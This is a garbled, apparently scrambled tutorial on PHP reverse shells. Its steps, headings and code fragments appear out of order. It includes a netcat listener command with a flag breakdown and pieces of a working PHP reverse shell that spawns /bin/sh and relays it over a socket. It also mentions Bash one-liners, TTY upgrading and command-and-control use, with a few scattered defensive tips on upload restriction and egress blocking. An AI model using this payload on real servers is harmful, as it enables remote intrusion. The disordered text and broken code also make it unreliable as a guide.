Once executed, any command typed into the listener machine is sent across the network, processed by the target server's shell, and the output is streamed back to the listener.

3. Common PHP Reverse Shell Methods
-p 4444: Specifies the port number to listen on (match this to your payload).

Step 2: Prepare the PHP Payload
Press . This command disables local terminal echoing (so your keystrokes pass directly to the remote machine) and brings the backgrounded Netcat listener back to the foreground (fg).
Professional testers often incorporate PHP reverse shells into their command-and-control infrastructure, enabling centralized management of multiple compromised systems.
: Executes a command and passes the raw, unformatted output directly back to the client. It is ideal for handling binary data output.

Advanced Stream Handling
By default, standard reverse shells lack basic terminal features. You cannot use text editors like nano, use the Tab key for auto-completion, or navigate through your command history using the arrow keys. Furthermore, pressing Ctrl+C will instantly kill your connection.
$sock = @fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) die("No connection: $errstr ($errno)");
Monitor changes to PHP files in web-accessible directories. Alert on new .php files in upload folders.
The most universal tool for this is Netcat. Run the following command on the control machine before executing the PHP script:

nc -lvnp 4444

Command breakdown:
-l: Sets Netcat to listen mode.
A typical PHP reverse shell implementation consists of several interdependent components that work together to establish and maintain the remote connection:
stream_set_blocking($fp, 0);
PHP reverse shells remain a cornerstone technique in web application security, exploiting the very flexibility that makes PHP a popular server‑side language. Understanding how they work—from the core socket connection to advanced evasion tactics—equips defenders to better protect their systems and helps ethical hackers identify vulnerabilities before malicious actors exploit them.
array("pipe", "r"), // stdin 1 => array("pipe", "w"), // stdout 2 => array("pipe", "w") // stderr ); // Spawn the shell process $process = proc_open('/bin/sh -i', $descriptorspec, $pipes); if (!is_resource($process)) exit(1); // Make pipes and socket non-blocking stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($socket, 0); while (1) feof($pipes[1])) break; // Read from shell stdout/stderr and write to socket $read_a = array($pipes[1], $pipes[2], $socket); $write_a = null; $error_a = null; // Monitor streams if (stream_select($read_a, $write_a, $error_a, null) > 0) if (in_array($pipes[1], $read_a)) $input = fread($pipes[1], $chunk_size); fwrite($socket, $input); if (in_array($pipes[2], $read_a)) $input = fread($pipes[2], $chunk_size); fwrite($socket, $input); if (in_array($socket, $read_a)) $input = fread($socket, $chunk_size); fwrite($pipes[0], $input); // Clean up resources fclose($socket); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); ?>

Method 2: The One-Liner (Web Shell/Execution payload)
Once the PHP script triggers on the server, your Netcat terminal will display a successful connection message and provide a command prompt.

5. Upgrading to a Fully Interactive TTY Shell
When the target system uses Bash, a reverse shell can be implemented using shell redirection without requiring PHP process management functions:
Defense in depth means patching both: restrict file uploads/execution AND block unexpected outbound connections.
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
The attacker opens a specific port on their own machine and waits for a connection.
Securing a web server against PHP execution requires a multi-layered defense-in-depth approach.

1. Secure File Upload Mechanisms
The reverse shell approach offers several distinct advantages from an offensive perspective: